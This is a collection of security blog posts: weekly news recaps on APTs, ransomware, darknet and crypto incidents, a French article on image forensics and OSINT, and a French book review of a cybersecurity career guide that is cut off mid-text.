Cryptocurrencies, Darknet, General Security, Privacy and Ransomware events.\nIn addition, we published an article about image forensic, presenting some techniques to use images for OSINT purposes and to determine if an image was photoshopped.\nAPT # Ukraine discloses identity of Gamaredon members, links it to Russia\u0026rsquo;s FSB (The Record)\nThe Ukrainian Secret Service revealed the identity of five members of the Gamaredon group and linked them to the Russian FSB. The group is suspected to be involved in more than 5,000 cyberattacks against at least 1,500 Ukrainian government systems.\nCryptocurrencies # \u0026lsquo;I Lost Everything\u0026rsquo;: How Squid Game Token Collapsed (CoinMarketCap)\nIn late November the Squid token was released with the promise for users to be able to enter a game where they could get rich (a bit like the TV show Squid Game after which it is named .) At some point, the coin\u0026rsquo;s price rose sharply (44,100% in 72h), holders were unable to sell, and the coin\u0026rsquo;s creator ran away with the money.\nDarknet # StExo Ordered to Forfeit £490,000 in Bitcoin (Darknetlive)\nA Liverpool court ordered White, one of the founders of SilkRoad 2.0, to hand over more than GBP 493,550 in Bitcoin. The man is in prison since 2019 where he was sentenced to 5 years for money laundering, possession of child pornography, and drug related offenses.\nGeneral Security # Phishing emails seemingly coming from a Kaspersky email address (Kaspersky)\nPhishing emails designed to steal Office 365 credentials were sent from the sm.kaspersky.com domain using Amazon SES (Simple Email Service) and a valid SES token that was issued to a third-party contractor during the testing of a website.\n2021 CWE Most Important Hardware Weaknesses (Mitre)\nFor the first time, MITRE published a list of the most important hardware weaknesses, in collaboration with the Hardware CWE Special Interest Group.\n\u0026lsquo;Destructive\u0026rsquo; cyberattack hits National Bank of Pakistan (The Record)\nThe National Bank of Pakistan is said to have suffered a \u0026ldquo;destructive\u0026rdquo; cyberattack impacting the bank\u0026rsquo;s ATM network, mobile apps, and servers used to interlink branches. No funds were reported stolen, and the attack is currently thought to be a sabotage attempt.\nTrick \u0026amp; Treat! 🎃 Paying Leets and Sweets for Linux Kernel privescs and k8s escapes (Google Blog)\nGoogle announced that it would raise its bounty from USD 31,337 to USD 50,337 for 0-day Linux kernel vulnerabilities, and exploits that use a new attack or technique. The program complements Android\u0026rsquo;s VRP rewards, so attacks that are also effective on Android will allow bigger bounties (an addition of up to USD 250,000.)\nUS Sanctions Could Cut Off NSO From Tech It Relies On (Vice)\nThe US government added the NSO group to a trade blacklist for providing spyware (Pegasus) to foreign governments that used them to target government officials, journalists, researchers, etc.\nAlleged Twitter hacker charged with theft of $784K in crypto via SIM swaps (Bleeping Computer)\nA suspected author of the Twitter hack of July 2020 (where multiple high profile accounts such as President Obama\u0026rsquo;s one were hacked to promote a cryptocurrency scam) was indicted this week by the US department of justice. He is accused of stealing USD 784,000 worth of cryptocurrencies using SIM swap attacks.\nPopular \u0026lsquo;coa\u0026rsquo; NPM library hijacked to steal user passwords (Bleeping Computer)\ncoa (9 million weekly downloads) and rc (14 million weekly downloads), two popular npm packages allowing to parse command-line arguments and configuration files, were hijacked to include password-stealing malware.\nPrivacy # Search warrant for Signal user data, Santa Clara County (Signal)\nA Californian court served a search warrant to Signal asking for various information such as a user\u0026rsquo;s name, contacts, call records, \u0026hellip; Signal was not able to provide anything else than the account\u0026rsquo;s creation and last connection timestamps.\nFacebook deletes 1 billion faceprints in Face Recognition shutdown (Bleeping Computer)\nFacebook announced that it will stop using its face recognition systems and will delete more than 1 billion people\u0026rsquo;s facial recognition profiles. Earlier this year, the company settled a class-action lawsuit for USD 650 million after being accused of collecting and storing users\u0026rsquo; biometric data without consent.\nRansomware # Europol announces “targeting” of 12 suspects in ransomware attacks (Naked Security)\nEuropol announced on October 29th that it arrested twelve individuals in an operation involving eight countries. These individuals are suspected of being involved in ransomware attacks, affecting more than 1,800 victims in 71 countries. Law enforcement also sized over USD 52,000 in cash and 5 luxury vehicles.\nRussian National Extradited to United States to Face Charges for Alleged Role in Cybercriminal Organization (US Department of Justice)\nA Russian national residing in both Southeast Asia and Russia appeared for the first time in front of a US court after its extraction from South Korea where he was arrested in February 2020. He is accused of being a member of a malicious group involved in deploying banking trojans and the ransomware Trickbot.\nCanadian province health care system disrupted by cyberattack (Bleeping Computer)\nThe Canadian province of Newfoundland and Labrador suffered a cyberattack on October 30th, causing multiple issues such as disrupting emails and 911 calls, preventing doctors from accessing and uploading medical results or registering new patients. The type of cyberattacks has not been officially announced but sources said it is ransomware.\nRansomware Actors Use Significant Financial Events and Stock Valuation to Facilitate Targeting and Extortion of Victims (FBI)\nThe FBI published a notification where it assesses that ransomware actors are \u0026ldquo;very likely using significant financial events, such as mergers and acquisitions, to target and leverage victim companies for ransomware infections.\u0026rdquo;\nBlackMatter ransomware says its shutting down due to pressure from local authorities (The Record)\nThe BlackMatter ransomware group announced on November 1st that they would be shutting down \u0026ldquo;due to certain unsolvable circumstances associated with pressure from the authorities.\u0026rdquo; Many experts expect that this is only part of a rebranding.\nThe \u0026lsquo;Groove\u0026rsquo; Ransomware Gang Was a Hoax (Krebs on Security)\nGroove, a union of ransomware gangs aiming to target US interests was announced on a cybercrime forum earlier in August. At this time, some security companies warned about the potential threat which turned out to be nothing else than a hoax designed to troll journalists and security firms.\nReward Offers for Information to Bring DarkSide Ransomware Variant Co-Conspirators to Justice (US Department of Justice)\nThe US Department of State announced that it would give a reward of up to USD 10 million for any information or location of key leaders of the Darkside ransomware group. In addition, it also offers up to USD 5 million for any information leading to the arrest and/or conviction (in any country) of any group member.\nIdentification of a new cybercriminal group : Lockean (ANSSI)\nThe National Cybersecurity Agency of France said it identified Lockean, a group active since at least June 2020 and that has a propensity to target French entities using multiple Ransomware-as-a-Service such as DoppelPaymer.\nInteresting Reads # The Demise of White House Market Will Shake Up the Dark Web (Wired) Governments Lack Plan to Deal with Fake Covid Vaccination Cards (DarknetMarkets) IDENTIFICATION OF A NEW CYBER CRIMINAL GROUP: LOCKEAN (ANSSI) ","date":"2021-11-05","externalUrl":null,"permalink":"/blog/weekly-news-recap-13/","section":"News","summary":"As always, plenty of things happened this week, but no worries if you had no time to go through all the news. Our weekly news recap will keep you up to date on the latest APTs, Cryptocurrencies, Darknet, General Security, Privacy and Ransomware events.\n","title":"Weekly News Recap 13","type":"news"},{"content":"Avertissement : Cet article a été traduit de l\u0026rsquo;anglais par un LLM. La précision n\u0026rsquo;est pas garantie. Vous pouvez lire l\u0026rsquo;article original en anglais.\nDe nos jours, tout le monde possède un smartphone et l\u0026rsquo;utilise pour prendre des photos et les partager, ce qui peut parfois entraîner le partage involontaire d\u0026rsquo;un lieu sensible (par exemple, votre adresse personnelle). Nous sommes aussi à l\u0026rsquo;ère de la désinformation sur les réseaux sociaux, où beaucoup de gens partagent (volontairement ou non) de fausses images pour soutenir leurs opinions ou servir leur agenda.\nDans cet article, nous parlerons des contre-mesures face à ces choses désagréables, et comment vous pouvez les utiliser à votre avantage pour acquérir des informations. Nous examinerons d\u0026rsquo;abord les métadonnées des images, puis mentionnerons quelques techniques pour déterminer si une image a été retouchée, et enfin listerons quelques méthodes que vous pouvez utiliser pour trouver l\u0026rsquo;origine d\u0026rsquo;une photo et le lieu où elle a été prise.\nEXIF et métadonnées # Vous avez peut-être déjà entendu parler d\u0026rsquo;EXIF ; cela signifie Exchangeable Image File Format et c\u0026rsquo;est un standard qui définit comment les métadonnées liées à une image sont gérées.\nEXIF peut stocker beaucoup de données sur vos photos, telles que :\nLe modèle de l\u0026rsquo;appareil photo (ou du smartphone) utilisé pour prendre la photo, ainsi que la version du système d\u0026rsquo;exploitation fonctionnant dessus La date et l\u0026rsquo;heure auxquelles la photo a été prise et modifiée Diverses informations techniques comme l\u0026rsquo;exposition, la focale, l\u0026rsquo;ISO, la résolution, si le flash a été utilisé, etc. La latitude GPS, la longitude, l\u0026rsquo;altitude de l\u0026rsquo;endroit où vous avez pris la photo, ainsi que la vitesse à laquelle vous vous déplaciez Ces informations peuvent être consultées à l\u0026rsquo;aide de divers logiciels, tels que FotoForensics (qui affiche aussi d\u0026rsquo;autres informations utiles - notez qu\u0026rsquo;il stockera votre image en ligne et la rendra accessible via une URL permanente), ou localement sur votre ordinateur (Ghiro est une bonne option open-source qui peut fonctionner localement). De telles informations peuvent être utiles pour certains photographes professionnels, mais pour la plupart des gens, elles ne feront que donner inutilement beaucoup d\u0026rsquo;informations personnelles. Voulez-vous partager le modèle de votre téléphone et le lieu d\u0026rsquo;une photo (par exemple, votre domicile) quand vous la partagez sur Internet ? Je ne pense pas. La NSA adore ça cependant. Ils auraient prévu d\u0026rsquo;ajouter des capacités de suivi EXIF à leur système XKeyscore en 2008.\nHeureusement, il y a des choses que vous pouvez faire pour vous protéger. Premièrement, Android et iOS vous permettent de ne pas inclure la localisation GPS dans les photos que vous prenez. Malheureusement, il ne semble pas que vous puissiez empêcher les autres informations d\u0026rsquo;être incluses lors de la prise de photo, mais tous les modèles et systèmes d\u0026rsquo;exploitation ont des fonctions intégrées pour supprimer ces données, ou pour partager des photos sans elles. Pour la plupart des gens, la suppression de la localisation GPS serait cependant probablement suffisante, car c\u0026rsquo;est l\u0026rsquo;information la plus sensible.\nNotez que de multiples autres métadonnées peuvent être attachées à une image. Par exemple, XMP (Extensible Metadata Platform), qui est un standard ISO créé par Adobe « pour la création, le traitement et l\u0026rsquo;échange de métadonnées standardisées et personnalisées pour les documents et ensembles de données numériques ». XMP contient aussi des informations utiles (si vous faites de l\u0026rsquo;OSINT) telles qu\u0026rsquo;un historique des opérations effectuées sur les images et le logiciel utilisé, et sur quelle plateforme.\nCette image a-t-elle été modifiée ? # Maintenant que nous avons parcouru les bases, plongeons un peu plus profondément et parlons des différentes choses que nous pouvons faire pour déterminer si une image a probablement été modifiée ou non. Un excellent logiciel que vous pouvez utiliser pour cela est 29a.ch, qui fournit de nombreux outils utiles. Dans cette partie, nous en présenterons trois et verrons comment il est possible d\u0026rsquo;en tirer parti pour analyser des images. Si vous êtes curieux d\u0026rsquo;en savoir plus sur d\u0026rsquo;autres types d\u0026rsquo;analyses (dont beaucoup sont aussi très utiles, comme la détection de clones), vous pouvez consulter les références à la fin de cet article.\nELA - Analyse du niveau d\u0026rsquo;erreur # Cette méthode peut fonctionner avec des formats utilisant la compression avec perte comme le JPEG. Ce type de compression utilise des approximations inexactes et supprime certaines parties des données afin de réduire la taille du fichier. Les images compressées sans perte (comme les PNG) au contraire conserveront les mêmes pixels même après compression.\nL\u0026rsquo;ELA permet de montrer les différents niveaux de compression au sein d\u0026rsquo;une image. Dans une situation normale, les différents éléments affichés dans l\u0026rsquo;image devraient être similaires, mais si l\u0026rsquo;image a été modifiée, certaines divergences peuvent être trouvées. Pour analyser une image, on doit regarder les éléments suivants :\nLes surfaces plates devraient être les mêmes, quelle que soit la couleur Les bords similaires devraient avoir une luminosité similaire Les textures qui se ressemblent dans l\u0026rsquo;image originale devraient faire de même avec le filtre ELA Les explications textuelles sont bien, mais dans ce cas, un exemple visuel serait plus facile à comprendre. Regardons l\u0026rsquo;exemple suivant.\nExemple d\u0026rsquo;analyse du niveau d\u0026rsquo;erreur pour l\u0026rsquo;image originale Exemple d\u0026rsquo;analyse du niveau d\u0026rsquo;erreur pour l\u0026rsquo;image originale L\u0026rsquo;image de gauche est le résultat du filtre ELA, et celle de droite est l\u0026rsquo;originale. L\u0026rsquo;image a été créée en collant deux images dans un arrière-plan : le personnage à l\u0026rsquo;arrière et les deux personnages qui se battent au premier plan.\nEn regardant l\u0026rsquo;image de l\u0026rsquo;analyse ELA, et en considérant les explications précédentes, il est assez facile de voir que l\u0026rsquo;image a été retouchée. Alors que les bordures des structures oranges dans l\u0026rsquo;image originale sont toutes similaires sous l\u0026rsquo;ELA, le contour des trois personnages a une luminosité largement différente.\nLoupe # La loupe est simple à utiliser : comme vous pouvez le deviner, l\u0026rsquo;idée est simplement de zoomer sur les parties suspectes pour voir si nous pouvons trouver quelque chose qui ne paraît pas naturel. Par exemple, si nous zoomons sur la tête du personnage en bas à droite dans l\u0026rsquo;image que nous avons utilisée dans la partie précédente, nous pouvons observer des pixels blancs entourant ses cheveux, son bandeau et ses vêtements, ce qui indique que l\u0026rsquo;image a probablement été collée dans la photo.\nExemple d\u0026rsquo;analyse d\u0026rsquo;image avec la loupe Analyse de la miniature # Pour les images JPEG, l\u0026rsquo;image miniature (si elle existe) est stockée dans les données EXIF. Parfois, il peut arriver que la miniature ne soit pas mise à jour quand l\u0026rsquo;image l\u0026rsquo;est, nous montrant ainsi la version originale de l\u0026rsquo;image.\nPour aller plus loin # Recherche inversée d\u0026rsquo;images # Souvent, vous pouvez trouver une image dont vous voulez en savoir plus. Par exemple, d\u0026rsquo;où elle provient. Pour vous aider, il existe de nombreux services en ligne qui permettent de trouver où une image (ou des images similaires) est utilisée. La liste suivante est un échantillon de tels services, mais vous pourriez aussi en trouver de plus spécialisés qui permettent de faire de la reconnaissance faciale. Notez que vous devez être prudent avec ce que vous envoyez à ces services (surtout les russes et les chinois), car ils stockeront probablement ce que vous téléchargez.\nimages.google.com bing.com/images tineye.com yandex.ru/images images.baidu.com Vous n\u0026rsquo;avez pas nécessairement besoin de l\u0026rsquo;image originale pour trouver ce que vous cherchez. Par exemple, si nous utilisions Google pour rechercher l\u0026rsquo;image que nous avons utilisée comme exemple dans la partie précédente, nous trouverions l\u0026rsquo;image d\u0026rsquo;arrière-plan originale (lien mort depuis : unsplash.com/photos/QjnobzYw7uU) sur Unsplash, même si notre entrée est un peu différente.\nDe même, nous pourrions recadrer les personnages de notre image pour essayer d\u0026rsquo;en savoir plus à leur sujet. Dans ce cas, nous ne trouvons pas l\u0026rsquo;image originale (sans surprise puisque l\u0026rsquo;arrière-plan rendrait l\u0026rsquo;image assez différente) mais Google nous donne tout de même des indications utiles. En l\u0026rsquo;occurrence, nous trouvons d\u0026rsquo;autres photos de ces personnages, comme le montre la capture d\u0026rsquo;écran suivante (notez que Google a automatiquement ajouté la partie « fictional character » à la recherche).\nRecherche inversée d\u0026rsquo;un échantillon d\u0026rsquo;image Autres conseils généraux # Jusqu\u0026rsquo;ici, cet article a donné un aperçu des méthodes de base qui peuvent être utilisées pour en savoir plus sur une image, comme les métadonnées, les filtres pour trouver des modifications, et des moyens d\u0026rsquo;identifier la source/le lieu/les personnes présentes dans une image. Cette partie listera quelques derniers conseils.\nNotez que même si vous analysez une image floue, il existe divers logiciels tels que Smart Deblur qui vous permettraient d\u0026rsquo;améliorer la qualité de l\u0026rsquo;image (les résultats sont variables) pour avoir une meilleure base de travail.\nPour conclure cet article, j\u0026rsquo;aimerais partager quelques conseils supplémentaires sur les choses que vous pouvez rechercher lorsque vous essayez de trouver où une photo a été prise.\nCherchez dans l\u0026rsquo;image du texte, des QR codes, \u0026hellip; Cela pourrait être le nom d\u0026rsquo;un magasin, un logo d\u0026rsquo;entreprise, \u0026hellip; Vous pourriez alors rechercher cet élément pour essayer de trouver son lien avec votre image (Google Translate peut être utilisé en mode capture d\u0026rsquo;image pour comprendre les langues étrangères). Par exemple, s\u0026rsquo;il y a un restaurant dans votre image, vous pourriez essayer de trouver où se trouve ce restaurant en utilisant le nom affiché sur son enseigne En général, essayez de trouver des choses qui ressortent dans votre image. Par exemple, si vous avez une vue de Tokyo d\u0026rsquo;en haut et que vous voyez la Tokyo Tower (sans savoir que c\u0026rsquo;est Tokyo/la Tokyo Tower), vous pourriez chercher « red white steel tower big city » dans Google pour en savoir plus En plus des conseils précédents, trouver plusieurs éléments distinctifs aidera à mieux trianguler la position d\u0026rsquo;où une photo a été prise Si vous avez une photo et que vous avez réussi à isoler un emplacement approximatif, vous pouvez utiliser les vues satellite et Street View de Google pour trouver l\u0026rsquo;endroit exact d\u0026rsquo;où la photo a été prise (attention à la date en bas de l\u0026rsquo;écran) Références # Photo Forensics Tutorial FhotoForensics Tutorial (notez que ce logiciel stockera votre image en ligne) Crédits images # Image de couverture par Mick Haupt sur Unsplash Photo par Jan Gottweiss sur Unsplash Wallpaper Naruto Shippuden sur Pinterest Naruto Vs Sasuke sur SeekPNG ","date":"2021-11-04","externalUrl":null,"permalink":"/fr/posts/2021/image-forensics-getting-intelligence-from-pictures/","section":"Articles","summary":"EXIF, métadonnées, recherche inversée d’images et trucages. Les images contiennent beaucoup d’informations. Apprenons comment les obtenir et les analyser.","title":"Analyse forensique d'images et OSINT : extraire du renseignement à partir de photos","type":"posts"},{"content":"As always, plenty of things happened this week, but no worries if you had no time to go through all the news. Our weekly news recap will keep you up to date on the latest APTs, Cryptocurrencies, Darknet, General Security, Privacy and Ransomware news.\nAPT # New activity from Russian actor Nobelium (Microsoft Blog)\nMicrosoft says that Nobelium, the Russian nation-state actor behind the SolarWind hack in 2020, is still trying to replicate his past approach by targeting the global IT supply chain. Since May 2021, it allegedly targeted more than 140 resellers and technology service providers and managed to compromise 14 of them. Microsoft says it is only a part of a larger wave a activities coming from this APT which also attacked at least 609 customers between July 1st and October 19th this year.\nFormer Air War College Professor Pleads Guilty to Making False Statements About Relationship with Government Official in China (US Department of Justice)\nA civilian professor at the Air War College in Alabama pleaded guilty to making false statements to a federal agent after failing to report contacts he had with a Chinese official between December 2021 and January 2017.\nNorth Korean state hackers start targeting the IT supply chain (Bleeping Computer)\nResearchers at Kaspersky assessed that Lazarus, a North-Korea backed APT, is building supply-chain attack capabilities. Among other things, the group used an updated version of its BLINDINGCAN malware to breach a Lativian IT vendor in May and used it as a proxy to compromise a South-Korean think-tank the following month.\nOperations at Iranian gas stations were disrupted today. Cyber attack or computer glitch? (Security Affairs)\nGas stations operated by the state-owned National Iranian Oil Products Distribution Company were disrupted on October 27th after screens at gas pumps were hijacked to display various messages, and the employees were not able to charge customers for the fuel that they were buying. The authorities made the assumption that this was the result of a cyber-attack by a hostile foreign state.\nChina Telecom booted out of USA as Feds worry it could disrupt or spy on local networks (The Register)\nThe US Federal Communications Commission announced that it terminated China Telecom\u0026rsquo;s permission to provide communications services in the USA for the sake of national security. The agency said that it has classified information assessing that China Telecom could \u0026ldquo;access, store, disrupt, and/or misroute US communications, which in turn allow them to engage in espionage and other harmful activities against the United States.\u0026rdquo;\nCryptocurrencies # German law enforcement begins auction of 215 seized bitcoins (The Block)\nThe Ministry of Justice of North Rhine-Westphalia started auctioning 215 Bitcoins on October 25th. The ministry estimated that one Bitcoin\u0026rsquo;s market value is EUR 54,000.\nMastercard says any bank or merchant on its vast network can soon offer crypto services (CNBC)\nMastercard is preparing to announce that banks and merchants using their payment network will soon be able to integrate cryptocurrencies into their products.\nCream Hacked Analysis, US $130 Million Hacked (SlowMist)\nCream Finance (a decentralized lending protocol) was hacked for the third time this year and lost an estimated USD 130 million in various assets. The hackers used some flaws to carry on price manipulations on flash loan (Cream\u0026rsquo;s lending system), which allowed them to artificially raise the value of their collateral and to be lent more funds than they should have been able to.\nDarknet # 150 arrested in dark web drug bust as police seize €26 million (Europol)\nEuropol announced that as a result of its new operation Dark HunTOR, police forces from Australia, Bulgaria, France, Germany, Italy, the Netherlands, Switzerland, the United Kingdom, and the United States arrested 150 individuals suspected of selling/buying illegal goods on darknet markets. Furthermore, more than EUR 26.7 million (in cash and cryptocurrencies), 234 kg of drugs, and 45 firearms were seized.\nMoney launderers for Russian hacking groups arrested in Ukraine (Bleeping Computer)\nUkrainian authorities arrested a group of malicious individuals at the request of some US intelligence services. They are accused of laundering millions of dollars for various hacking groups, and of being involved in cryptocurrency stealing activities.\nGeneral Security # DDoS attacks hit multiple email providers (The Record)\nOn Friday 22nd thee privacy-focused email providers (Fastmail, Posteo, and Runbox) suffered a massive DDoS attack allegedly carried out by the same malicious actor. Posteo said on a blog post that criminals asked for a ransom in order to stop the attack. The company refused to pay.\nEx-carrier employee sentenced for role in SIM-swapping scheme (ZDNet)\nA former mobile-carrier employee was sentenced for helping criminals to carry out sim-swapping attacks between 2017 and 2018. He reportedly received USD 2,325 in bribes and helped target at least 19 customers.\nHacker sells the data for millions of Moscow drivers for $800 (Bleeping Computer)\nA stolen database containing about 50 million records of Moscow car owners data is being sold on underground forums for USD 800. The source of the data is unknown but it appears to have been collected between 2006 and 2019 and contains various data such as cars information, full names, dates of birth, and phone numbers.\nPopular NPM Package Hijacked to Publish Crypto-mining Malware (The Hacker News)\nA hacker hijacked the NPM account of UAParser.js, an NMP library with more than six million weekly downloads, and embedded a crypto-mining and password-stealing malware. The versions 0.7.29, 0.8.0, and 1.00 (now patched) were targeted.\nNYT Journalist Repeatedly Hacked with Pegasus after Reporting on Saudi Arabia (University of Toronto - Citizen Lab)\nThe University of Toronto\u0026rsquo;s Citizen Lab says that the iPhone of the New York Times journalist Ben Hubbard was hacked multiple times using Pegasus (an NSO group\u0026rsquo;s spyware) between June 2018 and June 2021, while he was writing a book about the Saudi crown prince.\nEU investigating leak of private key used to forge Covid passes (Bleeping Computer)\nThe private key used to sign EU digital covid certificates is reportedly circulating on various messaging apps and online forums. The key is being used by fake certificate sellers to generate \u0026ldquo;real\u0026rdquo; certificates and was also used to create a certificate in the name of Adolf Hitler.\nPrivacy # Proton wins appeal in Swiss court over surveillance laws (Swiss Info)\nIn 2020, the Swiss Post and Telecommunications Surveillance Service decided that Proton Mail should be considered a telecommunications provider and therefore retain data necessary for surveillance. A court overruled this decision and said that the company could not be considered as a telecommunications provider, limiting its obligations to monitor traffic and retain users data.\nFacebook sues Ukrainian who scraped the data of 178 million users (The Record)\nFacebook sued a Ukrainian resident for allegedly scraping more than 178 million users\u0026rsquo; personal data using Facebook Messenger\u0026rsquo;s contact importer between January 2018 and September 2019, and selling them on cybercrime forums.\nRansomware # DarkSide ransomware rushes to cash out $7 million in Bitcoin (Bleeping Computer)\nAbout USD 7 million stored in a Bitcoin wallet controlled by DarkSide\u0026rsquo;s operators reportedly started moving in what appears to be an attempt to launder the funds. This occurs a few days after REvil announced its retirement due to a hijack of its infrastructure.\nConti Ransom Gang Starts Selling Access to Victims (Krebs on Security)\nThe Conti ransom gang announced in its victim-shaming blog that it was \u0026ldquo;looking for a buyer to access the network of [multiple organizations it has hacked] and sell data from their network\u0026rdquo;. Until now, the group would only ask for ransom from organizations it hacked, and publish their data on its website if they were not willing to pay.\nGrief ransomware gang hit US National Rifle Association (NRA) (Security Affairs)\nGrief ransomware operators announced on their website that they managed to hack the US NRA, and are threatening to leak the stolen data.\nGerman investigators identify REvil ransomware gang core member (Bleeping Computer)\nThe German police reportedly identified a Russian man (that is presenting himself as a cryptocurrency trader and investor) as one of the REvil group\u0026rsquo;s core members. The police managed to link Bitcoin payments with ransoms paid to the GrandGrab ransomware gang.\nInteresting Reads # NOBELIUM targeting delegated administrative privileges to facilitate broader attacks (Microsoft Blog) Wardrivers Can Still Easily Crack 70% of Wi-Fi Passwords (Dark Reading) APT trends report Q3 2021 (Secure List) Here\u0026rsquo;s the FBI\u0026rsquo;s Internal Guide for Getting Data from AT\u0026amp;T, T-Mobile, Verizon (Vice - pdf here) How we rolled out security keys at Twitter (Twitter Blog) An interview with LockBit: The risk of being hacked ourselves is always present (The Record) ","date":"2021-10-29","externalUrl":null,"permalink":"/blog/weekly-news-recap-12/","section":"News","summary":"As always, plenty of things happened this week, but no worries if you had no time to go through all the news. Our weekly news recap will keep you up to date on the latest APTs, Cryptocurrencies, Darknet, General Security, Privacy and Ransomware news.\n","title":"Weekly News Recap 12","type":"news"},{"content":"Avertissement : Cet article a été traduit de l\u0026rsquo;anglais par un LLM. La précision n\u0026rsquo;est pas garantie. Vous pouvez lire l\u0026rsquo;article original en anglais.\nJ\u0026rsquo;ai lu pas mal de livres récemment. Certains, liés à la sécurité, pourraient intéresser certains lecteurs de ce blog, j\u0026rsquo;ai donc décidé de créer une nouvelle catégorie Notes de lecture pour partager certaines des notes que je prends sur les livres (un résumé/les points principaux, et mes impressions générales).\nCybersecurity Career Master Plan: Proven techniques and effective tips to help you advance in your cybersecurity career est un livre écrit par Dr Gerald Auger, Jaclyn Scott, Jonathan Helmus et Kim Nguyen. Il a été publié en septembre 2021 et vise à donner des orientations aux personnes souhaitant obtenir un emploi dans l\u0026rsquo;industrie de la cybersécurité. Il est décrit comme suit (citation de la préface) :\nCe livre est un plan complet pour vous aider à décrypter le domaine et à comprendre une direction à prendre, les outils et fournitures à emporter dans votre voyage, et comment atteindre votre destination. [\u0026hellip;] Ce livre est divisé en [\u0026hellip;] trois sections logiques alignées sur une chronologie de carrière. La Section 1 [\u0026hellip;] vous aide à répondre à la question : « Un emploi en cybersécurité est-il fait pour moi, et si oui, lequel ? » La Section 2 [vous montre] comment appliquer vos connaissances, compétences et aptitudes dans le domaine et comment vous mettre en valeur auprès des responsables du recrutement potentiels La Section 3 [vous montre] comment faire évoluer votre carrière une fois que vous êtes dans le domaine [\u0026hellip;] Si vous êtes légèrement curieux ou férocement avide d\u0026rsquo;une carrière en cybersécurité, alors ce livre est pour vous.\nNotes sur le contenu du livre # Comme mentionné précédemment, le livre est divisé en trois parties. Nous les parcourrons toutes et mettrons en évidence leur contenu et leurs points principaux.\nSection 1 : Débuter en cybersécurité # Le premier chapitre de cette section introduira divers sujets liés à la cybersécurité, tels que les différentes lois relatives à la sécurité (RGPD, HIPAA, \u0026hellip;), les principaux référentiels de sécurité (NIST, ISO 2700/27001, SOC2, \u0026hellip;), ainsi que certains concepts comme la triade CIA (Confidentialité, Intégrité, Authentification) et quelques types d\u0026rsquo;attaques existantes. Le chapitre se termine en décrivant les avantages et inconvénients d\u0026rsquo;une carrière en cybersécurité. Entre autres :\nHoraires flexibles, excellent salaire, travail à distance Possible de se former par soi-même (mais les postes de débutant ont généralement pas mal de prérequis) Les choses bougent constamment, il faut donc rester à jour et se former La carrière nécessite une vraie passion et peut causer un épuisement mental dû au travail cérébral intense Les criminels ne prennent pas de vacances Quelques enseignements supplémentaires de ce chapitre sont qu\u0026rsquo;il est bon d\u0026rsquo;essayer de développer une ou deux spécialisations pour éviter d\u0026rsquo;être un touche-à-tout qui ne maîtrise rien, et qu\u0026rsquo;il existe d\u0026rsquo;abondantes ressources gratuites en ligne, donc commencer par elles avant d\u0026rsquo;utiliser des certifications et formations coûteuses est préférable.\nLe deuxième chapitre vise à répondre à la question « Quelle carrière vous convient ? » Pour ce faire, il liste les différents domaines possibles et explique de manière assez détaillée quels types d\u0026rsquo;emplois on peut y trouver. Les domaines principaux ont chacun différentes spécialités, comme listées ci-dessous :\nÉvaluation des risques (Sécurité offensive) Gouvernance (Gestion des risques, Conformité, Gouvernance) Renseignement sur les menaces (Externe et Interne) Opérations de sécurité (Réponse aux incidents) Architecture de sécurité (Sécurité cloud) Formation (Éducation, Formation et Sensibilisation) Quelques enseignements sont que, pour choisir comment construire votre carrière, vous devez trouver vos passions, identifier vos forces, créer une liste d\u0026rsquo;emplois de rêve tout en continuant à explorer pour découvrir de nouvelles options.\nPlusieurs composantes doivent être considérées lors de la construction d\u0026rsquo;une carrière : les compétences (relationnelles et techniques), vos passions et intérêts, la croissance personnelle potentielle, la valeur de l\u0026rsquo;emploi, le salaire, les opportunités de développement potentielles, etc.\nSection 2 : Votre chemin vers l\u0026rsquo;industrie # Cette section est là pour vous aider à décrocher un emploi dans l\u0026rsquo;industrie. Je la diviserais grossièrement en deux parties : la première est généralement liée aux différents types de secteurs, et quelles formations et certifications vous devriez envisager. La deuxième partie concerne principalement le réseautage, l\u0026rsquo;auto-promotion et la recherche d\u0026rsquo;emploi.\nIndustrie de la cybersécurité et formation # Dans le même esprit que la fin de la dernière section, les auteurs listent les 16 secteurs d\u0026rsquo;infrastructures critiques (par exemple, services financiers, santé et santé publique, énergie, technologies de l\u0026rsquo;information, \u0026hellip;) définis par l\u0026rsquo;agence américaine de cybersécurité et d\u0026rsquo;infrastructure, et discutent de ce à quoi s\u0026rsquo;attendre en travaillant dans chacun d\u0026rsquo;eux. Ils font de même pour les secteurs public et privé et expliquent aussi quelles sont les structures organisationnelles typiques des bureaux de sécurité. Si vous n\u0026rsquo;êtes pas sûr du type d\u0026rsquo;entreprise que vous souhaitez pour votre prochain emploi, ces informations seraient assez utiles pour guider votre choix.\nUn point sur lequel les gens sont généralement assez incertains est quel diplôme ou quelles certifications sont appropriés, ce qui est également abordé dans ce livre. Un chapitre liste les différentes certifications de l\u0026rsquo;industrie (CISSP, CompTIA Security+, OSCP, CEH, \u0026hellip;) et donne une idée de ce qu\u0026rsquo;elles enseignent, combien elles coûtent, à quel point elles sont reconnues, et quel est leur niveau de difficulté. Concernant les études supérieures, le livre mentionne que les postes de débutant paient généralement 10 à 15% de plus si vous avez un diplôme, et beaucoup exigeront au moins un master pour commencer.\nLe dernier chapitre de cette sous-partie vise à aider les lecteurs à résoudre le problème de l\u0026rsquo;œuf et la poule que l\u0026rsquo;on peut rencontrer quand on cherche un poste en sécurité sans expérience préalable beaucoup d\u0026rsquo;entreprises veulent que vous ayez de l\u0026rsquo;expérience pour vous embaucher (mention spéciale pour les entreprises demandant un CISSP pour des postes juniors), mais personne ne vous embauchera si vous n\u0026rsquo;avez pas d\u0026rsquo;expérience. Les auteurs font les suggestions suivantes (qui sont un peu redondantes avec les chapitres suivants) : Installez quelque chose comme WebGoat (une sorte de machines de test d\u0026rsquo;intrusion) pour pratiquer les tests de pénétration Essayez d\u0026rsquo;aller à des conférences, des événements de capture du drapeau, \u0026hellip; pour avoir des contacts dans l\u0026rsquo;industrie, mais aussi pour être à jour avec les dernières tendances Si vous en avez l\u0026rsquo;opportunité, faire du bénévolat pour aider lors de conférences est un bon moyen de se connecter avec diverses personnes partageant les mêmes intérêts Essayez d\u0026rsquo;élargir votre réseau professionnel : la plupart des postes ouverts ne sont jamais publiés en ligne, et si vous connaissez quelqu\u0026rsquo;un, vous pourriez passer par moins d\u0026rsquo;entretiens par rapport au processus normal Si vous avez de l\u0026rsquo;expérience dans des emplois quelque peu liés (par exemple, ingénieur logiciel, help desk, \u0026hellip;), essayez de tirer parti de cette expérience Vous pourriez créer un blog pour vous aider à mettre en valeur vos compétences et votre capacité à communiquer tout en acquérant des connaissances Si vous êtes déjà 